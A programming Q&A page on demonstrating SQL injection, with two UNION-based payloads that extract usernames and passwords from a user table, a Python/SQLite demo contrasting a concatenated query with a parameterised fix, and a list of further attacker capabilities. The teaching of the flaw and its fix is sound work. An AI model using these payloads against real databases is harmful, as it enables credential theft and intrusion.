How to demonstrate SQL injection?

I'm assuming you're using the standard PHP mysql_query function, in which case something like this would be effective in your example.

SELECT price FROM products WHERE 1=1 AND id=
999999999999999999999999
UNION ALL
(SELECT CONCAT(username, ' ', password) FROM user) LIMIT 0, 1;

Explanation

  1. Use an ID of a product that is not going to exist.
  2. UNION with users table.
  3. SELECT a single column in the users table to return, as you're only returning a single column from the product. In this case, return a concatenated field of the username and password columns.
  4. Limit to 1, as your code is presumably expecting only a single result from the query. You could alternatively use a WHERE condition to specify a specific user that you want to retrieve.

Another example would be to use GROUP_CONCAT; this would allow for the retrieval of all the entries from the user table in a single query. Inspired by the answer on another question here.

SELECT price FROM products WHERE 1=1 AND id=-1
UNION ALL
(SELECT CONCAT(GROUP_CONCAT(username), '\n', GROUP_CONCAT(password)) FROM user);

Additional resources covering SQL Injection attacks:

  • SQL Injection from php manual
  • SQL Injection Cheat Sheet
  • SQL Injection Attacks by Example
  • xkcd: Exploits of a Mom
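To show why the string concatenation in the question is the root problem and how binding the value removes it, here is an added example (not part of the answer above) in Python with an in-memory SQLite database standing in for the PHP/MySQL application. The tables and rows are constructed, and the answer's two payloads are adapted to SQLite syntax (|| instead of CONCAT, and no parentheses around the UNIONed SELECT, which SQLite rejects).

```python
import sqlite3

# Constructed stand-in for the application in the question: a products
# table the page queries and a user table it must never expose.
def make_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE products (id INTEGER PRIMARY KEY, price TEXT);
        CREATE TABLE user (username TEXT, password TEXT);
        INSERT INTO products VALUES (1, '9.99'), (2, '19.99');
        INSERT INTO user VALUES ('alice', 'hash-a'), ('bob', 'hash-b');
    """)
    return db

def price_vulnerable(db, product_id):
    # Same shape as mysql_query("... WHERE 1=1 AND id=" . $_GET['id']):
    # the untrusted value becomes part of the SQL text the engine parses.
    sql = f"SELECT price FROM products WHERE 1=1 AND id={product_id}"
    row = db.execute(sql).fetchone()
    return row[0] if row else None

def price_parameterised(db, product_id):
    # The fix: the value is bound as a parameter, so it is only ever
    # compared against id and is never parsed as SQL.
    row = db.execute("SELECT price FROM products WHERE 1=1 AND id=?",
                     (product_id,)).fetchone()
    return row[0] if row else None

# The answer's payloads, adapted to SQLite (constructed for this demo).
PAYLOAD_ONE = ("999999999999999999999999 UNION ALL "
               "SELECT username || ' ' || password FROM user LIMIT 0, 1")
PAYLOAD_ALL = ("-1 UNION ALL SELECT group_concat(username) || '\n' || "
               "group_concat(password) FROM user")

def demo():
    # Runs both the concatenated and the parameterised query with a
    # legitimate id and with each payload, returning every result.
    db = make_db()
    return {
        "normal": price_vulnerable(db, 1),
        "leak_one": price_vulnerable(db, PAYLOAD_ONE),
        "leak_all": price_vulnerable(db, PAYLOAD_ALL),
        "fixed_normal": price_parameterised(db, 1),
        "fixed_one": price_parameterised(db, PAYLOAD_ONE),
        "fixed_all": price_parameterised(db, PAYLOAD_ALL),
    }

if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value!r}")
```

The parameterised version returns no row for either payload because the bound text can only be compared with the id column, whereas the concatenated version hands the same text to the SQL parser.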

To your last question:

Alternatively, what else can I get the system to show?

Generally, it depends on how the SQL server is configured and whether there are some mitigations present. But the attacker is not limited to just showing user passwords; alternatively, he can try to:

  • read from and write to various files;
  • write to database and read from it;
  • perform DoS and other harmful actions.

Each operation depends on several factors, like, as I said, the presence of mitigation factors, file permissions, system configuration, etc.

By the way, for the attacker there is no need for the result of the SQL request to be shown. When the attacker cannot view the response, it makes the process of information extraction slower and harder, but not impossible.

If you are interested, I would suggest you read the blog of Bernardo Damele, the creator of sqlmap: http://bernardodamele.blogspot.com/. There are interesting presentations and reading material on what can be done and how.